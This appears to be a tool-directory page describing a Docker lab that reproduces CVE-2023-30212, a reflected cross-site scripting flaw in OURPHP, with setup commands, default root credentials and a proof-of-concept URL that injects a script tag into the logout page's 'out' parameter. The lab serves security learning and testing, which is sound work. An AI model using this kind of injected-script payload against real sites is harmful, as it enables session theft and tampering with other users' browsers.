Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-30212 — Docker-based vulnerable OURPHP lab for reproducing CVE-2023-30212, a reflected XSS vulnerability, with setup instructions and proof-of-concept exploit URL. | Kitploit
Tools/GitHubGitHub/aash035/cve-2023-30212
Container SecurityVulnerability AnalysisWeb Application ExploitationLearning & EducationLabs & Practice
GitHubaash035/cve-2023-30212

CVE-2023-30212

Docker-based vulnerable OURPHP lab for reproducing CVE-2023-30212, a reflected XSS vulnerability, with setup instructions and proof-of-concept exploit URL.

View Repository
133 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-30212 LAB SETUP

Prerequisite
Download docker.io
sudo apt install -y docker.io


STEPS
  1. Download all files from my repository using the below command.
    git clone https://github.com/AAsh035/CVE-2023-30212.git

  2. Now to make a docker image run the following command:
    sudo docker build -t vuln .

  3. Next is to change the docker image to a conatainer.The container need to run at port 80 The command is :
    sudo docker run -d -p 80:80 vuln

  4. To check if the container is up use the command:
    sudo docker ps

  5. Type 127.0.0.1 in the browser and an OURPHP page will be loaded.

  6. You need to configure the ourphp with the following:
    Username : root
    Password : root
    Database Name: vuln

  7. Now you need to configure username and password for Administrative. Set the following:
    Username: root
    Password: root

  8. Now copy the below link and paste it in the browser:
    http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>

https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0

Download Tool